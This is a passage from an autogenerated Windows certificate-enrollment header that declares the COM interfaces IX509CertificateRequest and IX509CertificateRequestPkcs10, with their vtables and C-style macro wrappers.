        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequest * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequest * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequest * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequest * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequest * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequest * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequest * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequest * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509CertificateRequestVtbl;

    interface IX509CertificateRequest
    {
        CONST_VTBL struct IX509CertificateRequestVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequest_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequest_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequest_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequest_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequest_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequest_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequest_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequest_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequest_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequest_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequest_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequest_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequest_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequest_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequest_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequest_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequest_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequest_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequest_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequest_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequest_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequest_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequest_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequest_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequest_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequest_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequest_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequest_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequest_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequest_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequest_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequest_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequest_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0073 */
/* [local] */ 

typedef 
enum Pkcs10AllowedSignatureTypes
    {	AllowedKeySignature	= 0x1,
	AllowedNullSignature	= 0x2
    } 	Pkcs10AllowedSignatureTypes;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0073_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0073_v0_0_s_ifspec;

#ifndef __IX509CertificateRequestPkcs10_INTERFACE_DEFINED__
#define __IX509CertificateRequestPkcs10_INTERFACE_DEFINED__

/* interface IX509CertificateRequestPkcs10 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestPkcs10;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab342-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestPkcs10 : public IX509CertificateRequest
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplateName( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeFromPrivateKey( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromPublicKey( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromCertificate( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions = InheritDefault) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CheckSignature( 
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes = AllowedKeySignature) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE IsSmartCard( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_TemplateObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PublicKey( 
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_PrivateKey( 
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NullSigned( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ReuseKey( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_OldCertificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Subject( 
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_Subject( 
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CspStatuses( 
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_SmimeCapabilities( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_SmimeCapabilities( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SignatureInformation( 
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_KeyContainerNamePrefix( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_KeyContainerNamePrefix( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CryptAttributes( 
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_X509Extensions( 
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CriticalExtensions( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SuppressOids( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawDataToBeSigned( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Signature( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCspStatuses( 
            /* [in] */ X509KeySpec KeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppCspStatuses) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestPkcs10Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestPkcs10 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestPkcs10 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestPkcs10 * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestPkcs10 * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestPkcs10 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKey )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *CheckSignature )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes);
        
        HRESULT ( STDMETHODCALLTYPE *IsSmartCard )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateObjectId )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PublicKey )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_PrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ReuseKey )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OldCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Subject )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Subject )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspStatuses )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CryptAttributes )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressOids )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawDataToBeSigned )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
